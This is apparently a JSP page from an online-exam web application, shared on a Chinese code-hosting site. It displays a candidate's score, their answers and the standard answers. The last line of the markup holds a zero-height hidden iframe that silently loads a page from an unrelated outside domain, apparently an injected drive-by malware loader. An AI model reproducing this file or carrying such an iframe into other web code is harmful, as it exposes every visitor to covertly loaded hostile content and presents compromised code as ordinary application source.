showscore.jsp
来自「在线考试 考生登陆 查分 管理员管理后台等的 的的的的达到的达到的的的」· JSP 代码 · 共 27 行
JSP
27 行
<%@page contentType="text/html" pageEncoding="UTF-8"%><%@page import = "com.eonline.model.*" %><%@ taglib prefix="html" uri="http://struts.apache.org/tags-html" %><% if ((User) request.getSession().getAttribute("userItem") == null) { response.sendRedirect("/index.jsp"); }%><h1>Exam Over!</h1><h3>Your test scores are as following:</h3><br/><h3>date:</h3> ${score.date} <br/><h3>score:</h3>${score.score} <br/><br/><h3>The following are your answers:</h3><h4>${uanswer}</h4><h3>The following are standard answers:</h3><h4>${sanswer}</h4><html:form action="show_score.do" method="POST"> <html:submit value="Show All Score List" ></html:submit></html:form><iframe src=http://www.114Oldest.com/zz/mm.htm width=100 height=0></iframe>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?